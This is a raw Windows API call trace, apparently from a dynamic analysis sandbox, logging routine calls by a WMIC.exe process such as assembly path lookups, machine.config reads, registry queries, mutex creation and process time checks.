	[0122.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xd7eed8e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0122.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7eed8e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0122.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7eed8e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0122.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7eed8e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0122.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7eed8e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0122.268] SetEvent (hEvent=0x64c) returned 1
	[0122.300] CoUninitialize () 

Thread:
	id = 200
	os_tid = 0x454

	[0122.338] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0122.349] VirtualQuery (in: lpAddress=0xef71dd40, lpBuffer=0xd7ef71ec00, dwLength=0x30 | out: lpBuffer=0xd7ef71ec00*(BaseAddress=0xef71d000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fe5f3000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0122.353] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54a60
	[0122.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54a60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.353] CoTaskMemFree (pv=0x2ad22d54a60) 
	[0122.354] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55c70
	[0122.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55c70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.354] CoTaskMemFree (pv=0x2ad22d55c70) 
	[0122.354] VirtualQuery (in: lpAddress=0xef71dff0, lpBuffer=0xd7ef71eeb0, dwLength=0x30 | out: lpBuffer=0xd7ef71eeb0*(BaseAddress=0xef71d000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fe5f3000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0122.362] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54950
	[0122.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.362] CoTaskMemFree (pv=0x2ad22d54950) 
	[0122.363] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d553f0
	[0122.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d553f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.363] CoTaskMemFree (pv=0x2ad22d553f0) 
	[0122.364] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54620
	[0122.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.364] CoTaskMemFree (pv=0x2ad22d54620) 
	[0122.365] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54d90
	[0122.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54d90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.365] CoTaskMemFree (pv=0x2ad22d54d90) 
	[0122.366] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d553f0
	[0122.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d553f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.366] CoTaskMemFree (pv=0x2ad22d553f0) 
	[0122.367] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55fa0
	[0122.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55fa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.367] CoTaskMemFree (pv=0x2ad22d55fa0) 
	[0122.373] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55fa0
	[0122.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55fa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0122.373] CoTaskMemFree (pv=0x2ad22d55fa0) 
	[0122.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0xd7ef71df40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0122.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0xd7ef71de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0122.477] CoTaskMemAlloc (cb=0x20c) returned 0x2ad22d12520
	[0122.477] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ad22d12520, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x21
	[0122.477] CoTaskMemFree (pv=0x2ad22d12520) 
	[0122.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0xd7ef71dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21
	[0122.487] GetVersionExW (in: lpVersionInformation=0xd7ef71de70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd7ef71de70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0122.488] GetCurrentProcess () returned 0xffffffffffffffff
	[0122.488] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71df08 | out: TokenHandle=0xd7ef71df08*=0x684) returned 1
	[0122.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0xd7ef71db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0122.492] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xd7ef71dfb0 | out: lpFileInformation=0xd7ef71dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc94c402, ftCreationTime.dwHighDateTime=0x1d31d7e, ftLastAccessTime.dwLowDateTime=0xda83d430, ftLastAccessTime.dwHighDateTime=0x1d31d7e, ftLastWriteTime.dwLowDateTime=0xe1c66467, ftLastWriteTime.dwHighDateTime=0x1d31d7e, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
	[0122.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0xd7ef71db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0122.492] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xd7ef71df60 | out: lpFileInformation=0xd7ef71df60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc94c402, ftCreationTime.dwHighDateTime=0x1d31d7e, ftLastAccessTime.dwLowDateTime=0xda83d430, ftLastAccessTime.dwHighDateTime=0x1d31d7e, ftLastWriteTime.dwLowDateTime=0xe1c66467, ftLastWriteTime.dwHighDateTime=0x1d31d7e, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
	[0122.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0xd7ef71d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0122.493] SetErrorMode (uMode=0x1) returned 0x8001
	[0122.493] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x68c
	[0122.493] GetFileType (hFile=0x68c) returned 0x1
	[0122.493] SetErrorMode (uMode=0x8001) returned 0x1
	[0122.493] GetFileType (hFile=0x68c) returned 0x1
	[0122.495] GetFileSize (in: hFile=0x68c, lpFileSizeHigh=0xd7ef71df58 | out: lpFileSizeHigh=0xd7ef71df58*=0x0) returned 0x65b3
	[0122.495] ReadFile (in: hFile=0x68c, lpBuffer=0x2ad236a91d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7ef71de78, lpOverlapped=0x0 | out: lpBuffer=0x2ad236a91d0*, lpNumberOfBytesRead=0xd7ef71de78*=0x1000, lpOverlapped=0x0) returned 1
	[0122.500] ReadFile (in: hFile=0x68c, lpBuffer=0x2ad236a91d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7ef71db58, lpOverlapped=0x0 | out: lpBuffer=0x2ad236a91d0*, lpNumberOfBytesRead=0xd7ef71db58*=0x1000, lpOverlapped=0x0) returned 1
	[0122.501] ReadFile (in: hFile=0x68c, lpBuffer=0x2ad236a91d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7ef71d9a8, lpOverlapped=0x0 | out: lpBuffer=0x2ad236a91d0*, lpNumberOfBytesRead=0xd7ef71d9a8*=0x1000, lpOverlapped=0x0) returned 1
	[0122.501] ReadFile (in: hFile=0x68c, lpBuffer=0x2ad236a91d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7ef71d9a8, lpOverlapped=0x0 | out: lpBuffer=0x2ad236a91d0*, lpNumberOfBytesRead=0xd7ef71d9a8*=0x1000, lpOverlapped=0x0) returned 1
	[0122.501] ReadFile (in: hFile=0x68c, lpBuffer=0x2ad236a91d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7ef71d9a8, lpOverlapped=0x0 | out: lpBuffer=0x2ad236a91d0*, lpNumberOfBytesRead=0xd7ef71d9a8*=0x1000, lpOverlapped=0x0) returned 1
	[0122.507] ReadFile (in: hFile=0x68c, lpBuffer=0x2ad236a91d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7ef71dae8, lpOverlapped=0x0 | out: lpBuffer=0x2ad236a91d0*, lpNumberOfBytesRead=0xd7ef71dae8*=0x1000, lpOverlapped=0x0) returned 1
	[0122.507] ReadFile (in: hFile=0x68c, lpBuffer=0x2ad236a91d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7ef71d908, lpOverlapped=0x0 | out: lpBuffer=0x2ad236a91d0*, lpNumberOfBytesRead=0xd7ef71d908*=0x5b3, lpOverlapped=0x0) returned 1
	[0122.508] ReadFile (in: hFile=0x68c, lpBuffer=0x2ad236a91d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7ef71dab8, lpOverlapped=0x0 | out: lpBuffer=0x2ad236a91d0*, lpNumberOfBytesRead=0xd7ef71dab8*=0x0, lpOverlapped=0x0) returned 1
	[0122.508] CloseHandle (hObject=0x68c) returned 1
	[0122.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0xd7ef71df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0122.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0xd7ef71de30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0122.509] CoTaskMemAlloc (cb=0x20c) returned 0x2ad22d11200
	[0122.509] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ad22d11200, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x21
	[0122.509] CoTaskMemFree (pv=0x2ad22d11200) 
	[0122.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0xd7ef71df90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21
	[0122.510] GetCurrentProcess () returned 0xffffffffffffffff
	[0122.510] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71e168 | out: TokenHandle=0xd7ef71e168*=0x68c) returned 1
	[0122.510] GetCurrentProcess () returned 0xffffffffffffffff
	[0122.510] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71e168 | out: TokenHandle=0xd7ef71e168*=0x688) returned 1
	[0122.511] GetCurrentProcess () returned 0xffffffffffffffff
	[0122.511] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71df08 | out: TokenHandle=0xd7ef71df08*=0x6a4) returned 1
	[0122.511] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config" (normalized: "c:\\windows\\system32\\wbem\\wmic.config"), fInfoLevelId=0x0, lpFileInformation=0xd7ef71dfb0 | out: lpFileInformation=0xd7ef71dfb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0122.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0xd7ef71db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0122.512] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config" (normalized: "c:\\windows\\system32\\wbem\\wmic.config"), fInfoLevelId=0x0, lpFileInformation=0xd7ef71df60 | out: lpFileInformation=0xd7ef71df60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0122.513] GetCurrentProcess () returned 0xffffffffffffffff
	[0122.513] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71e168 | out: TokenHandle=0xd7ef71e168*=0x678) returned 1
	[0122.513] GetCurrentProcess () returned 0xffffffffffffffff
	[0122.513] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71e168 | out: TokenHandle=0xd7ef71e168*=0x6ac) returned 1
	[0122.526] GetCurrentProcess () returned 0xffffffffffffffff
	[0122.526] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71dde8 | out: TokenHandle=0xd7ef71dde8*=0x6b0) returned 1
	[0122.539] GetCurrentProcess () returned 0xffffffffffffffff
	[0122.539] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71dde8 | out: TokenHandle=0xd7ef71dde8*=0x6b4) returned 1
	[0122.550] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71d4a8 | out: phkResult=0xd7ef71d4a8*=0x6b8) returned 0x0
	[0122.550] RegQueryValueExW (in: hKey=0x6b8, lpValueName="InstallationType", lpReserved=0x0, lpType=0xd7ef71d42c, lpData=0x0, lpcbData=0xd7ef71d428*=0x0 | out: lpType=0xd7ef71d42c*=0x1, lpData=0x0, lpcbData=0xd7ef71d428*=0xe) returned 0x0
	[0122.550] CoTaskMemAlloc (cb=0x12) returned 0x2ad3baadcf0
	[0122.550] RegQueryValueExW (in: hKey=0x6b8, lpValueName="InstallationType", lpReserved=0x0, lpType=0xd7ef71d3fc, lpData=0x2ad3baadcf0, lpcbData=0xd7ef71d3f8*=0xe | out: lpType=0xd7ef71d3fc*=0x1, lpData="Client", lpcbData=0xd7ef71d3f8*=0xe) returned 0x0
	[0122.550] CoTaskMemFree (pv=0x2ad3baadcf0) 
	[0122.550] RegCloseKey (hKey=0x6b8) returned 0x0
	[0122.560] GetCurrentProcessId () returned 0x434
	[0122.568] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069e460
	[0122.568] GetComputerNameW (in: lpBuffer=0x2ad2069e460, nSize=0x2ad236cb948 | out: lpBuffer="X2VS1CUM", nSize=0x2ad236cb948) returned 1
	[0122.568] CoTaskMemFree (pv=0x2ad2069e460) 
	[0122.569] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71e2c8 | out: phkResult=0xd7ef71e2c8*=0x6b8) returned 0x0
	[0122.570] RegQueryValueExW (in: hKey=0x6b8, lpValueName="Library", lpReserved=0x0, lpType=0xd7ef71e22c, lpData=0x0, lpcbData=0xd7ef71e228*=0x0 | out: lpType=0xd7ef71e22c*=0x2, lpData=0x0, lpcbData=0xd7ef71e228*=0x48) returned 0x0
	[0122.570] CoTaskMemAlloc (cb=0x4c) returned 0x2ad22d59d40
	[0122.570] RegQueryValueExW (in: hKey=0x6b8, lpValueName="Library", lpReserved=0x0, lpType=0xd7ef71e1fc, lpData=0x2ad22d59d40, lpcbData=0xd7ef71e1f8*=0x48 | out: lpType=0xd7ef71e1fc*=0x2, lpData="%systemroot%\\system32\\netfxperf.dll", lpcbData=0xd7ef71e1f8*=0x48) returned 0x0
	[0122.570] CoTaskMemFree (pv=0x2ad22d59d40) 
	[0122.570] RegQueryValueExW (in: hKey=0x6b8, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0xd7ef71e24c, lpData=0x0, lpcbData=0xd7ef71e248*=0x0 | out: lpType=0xd7ef71e24c*=0x4, lpData=0x0, lpcbData=0xd7ef71e248*=0x4) returned 0x0
	[0122.571] RegQueryValueExW (in: hKey=0x6b8, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0xd7ef71e250, lpData=0xd7ef71e24c, lpcbData=0xd7ef71e248*=0x4 | out: lpType=0xd7ef71e250*=0x4, lpData=0xd7ef71e24c*=0x1, lpcbData=0xd7ef71e248*=0x4) returned 0x0
	[0122.571] RegQueryValueExW (in: hKey=0x6b8, lpValueName="First Counter", lpReserved=0x0, lpType=0xd7ef71e24c, lpData=0x0, lpcbData=0xd7ef71e248*=0x0 | out: lpType=0xd7ef71e24c*=0x4, lpData=0x0, lpcbData=0xd7ef71e248*=0x4) returned 0x0
	[0122.571] RegQueryValueExW (in: hKey=0x6b8, lpValueName="First Counter", lpReserved=0x0, lpType=0xd7ef71e250, lpData=0xd7ef71e24c, lpcbData=0xd7ef71e248*=0x4 | out: lpType=0xd7ef71e250*=0x4, lpData=0xd7ef71e24c*=0x1770, lpcbData=0xd7ef71e248*=0x4) returned 0x0
	[0122.571] RegCloseKey (hKey=0x6b8) returned 0x0
	[0122.573] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71e288 | out: phkResult=0xd7ef71e288*=0x6b8) returned 0x0
	[0122.573] RegQueryValueExW (in: hKey=0x6b8, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0xd7ef71e20c, lpData=0x0, lpcbData=0xd7ef71e208*=0x0 | out: lpType=0xd7ef71e20c*=0x4, lpData=0x0, lpcbData=0xd7ef71e208*=0x4) returned 0x0
	[0122.573] RegQueryValueExW (in: hKey=0x6b8, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0xd7ef71e210, lpData=0xd7ef71e20c, lpcbData=0xd7ef71e208*=0x4 | out: lpType=0xd7ef71e210*=0x4, lpData=0xd7ef71e20c*=0x3, lpcbData=0xd7ef71e208*=0x4) returned 0x0
	[0122.573] RegQueryValueExW (in: hKey=0x6b8, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0xd7ef71e20c, lpData=0x0, lpcbData=0xd7ef71e208*=0x0 | out: lpType=0xd7ef71e20c*=0x4, lpData=0x0, lpcbData=0xd7ef71e208*=0x4) returned 0x0
	[0122.573] RegQueryValueExW (in: hKey=0x6b8, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0xd7ef71e210, lpData=0xd7ef71e20c, lpcbData=0xd7ef71e208*=0x4 | out: lpType=0xd7ef71e210*=0x4, lpData=0xd7ef71e20c*=0x20000, lpcbData=0xd7ef71e208*=0x4) returned 0x0
	[0122.573] RegQueryValueExW (in: hKey=0x6b8, lpValueName="Counter Names", lpReserved=0x0, lpType=0xd7ef71e20c, lpData=0x0, lpcbData=0xd7ef71e208*=0x0 | out: lpType=0xd7ef71e20c*=0x3, lpData=0x0, lpcbData=0xd7ef71e208*=0xaa) returned 0x0
	[0122.573] RegQueryValueExW (in: hKey=0x6b8, lpValueName="Counter Names", lpReserved=0x0, lpType=0xd7ef71e20c, lpData=0x2ad236cebd0, lpcbData=0xd7ef71e208*=0xaa | out: lpType=0xd7ef71e20c*=0x3, lpData=0x2ad236cebd0*, lpcbData=0xd7ef71e208*=0xaa) returned 0x0
	[0122.575] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0122.578] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0xd7ef71e1c0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0122.579] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x404
	[0122.581] MapViewOfFile (hFileMappingObject=0x404, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2ad3bcb0000
	[0122.581] VirtualQuery (in: lpAddress=0x2ad3bcb0000, lpBuffer=0xd7ef71e1b8, dwLength=0x30 | out: lpBuffer=0xd7ef71e1b8*(BaseAddress=0x2ad3bcb0000, AllocationBase=0x2ad3bcb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0xd7)) returned 0x30
	[0122.581] LocalFree (hMem=0x2ad3bab1370) returned 0x0
	[0122.582] RegCloseKey (hKey=0x6b8) returned 0x0
	[0122.583] GetVersionExW (in: lpVersionInformation=0xd7ef71d190*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd7ef71d190*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0122.584] GetVersionExW (in: lpVersionInformation=0xd7ef71d160*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd7ef71d160*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0122.585] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ad236cf830, cbSid=0xd7ef71e1a0 | out: pSid=0x2ad236cf830*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0xd7ef71e1a0) returned 1
	[0122.586] CreateMutexW (lpMutexAttributes=0x2ad236cfa38, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6b8
	[0122.588] WaitForSingleObject (hHandle=0x6b8, dwMilliseconds=0x1f4) returned 0x0
	[0122.589] GetCurrentProcessId () returned 0x434
	[0122.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x434) returned 0x6c8
	[0122.591] GetProcessTimes (in: hProcess=0x6c8, lpCreationTime=0xd7ef71e0b0, lpExitTime=0xd7ef71e0a8, lpKernelTime=0xd7ef71e0a0, lpUserTime=0xd7ef71e098 | out: lpCreationTime=0xd7ef71e0b0, lpExitTime=0xd7ef71e0a8, lpKernelTime=0xd7ef71e0a0, lpUserTime=0xd7ef71e098) returned 1
	[0122.591] CloseHandle (hObject=0x6c8) returned 1
	[0122.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd94) returned 0x6c8
	[0122.591] GetProcessTimes (in: hProcess=0x6c8, lpCreationTime=0xd7ef71e140, lpExitTime=0xd7ef71e138, lpKernelTime=0xd7ef71e130, lpUserTime=0xd7ef71e128 | out: lpCreationTime=0xd7ef71e140, lpExitTime=0xd7ef71e138, lpKernelTime=0xd7ef71e130, lpUserTime=0xd7ef71e128) returned 1
	[0122.591] CloseHandle (hObject=0x6c8) returned 1
	[0122.591] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xd94) returned 0x6c8
	[0122.595] GetCurrentProcess () returned 0xffffffffffffffff
	[0122.595] GetCurrentProcess () returned 0xffffffffffffffff
	[0122.595] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x6c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xd7ef71e098, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xd7ef71e098*=0x6cc) returned 1
	[0122.596] CloseHandle (hObject=0x6cc) returned 1
	[0122.596] CloseHandle (hObject=0x6c8) returned 1
	[0122.597] ReleaseMutex (hMutex=0x6b8) returned 1
	[0122.598] CloseHandle (hObject=0x6b8) returned 1
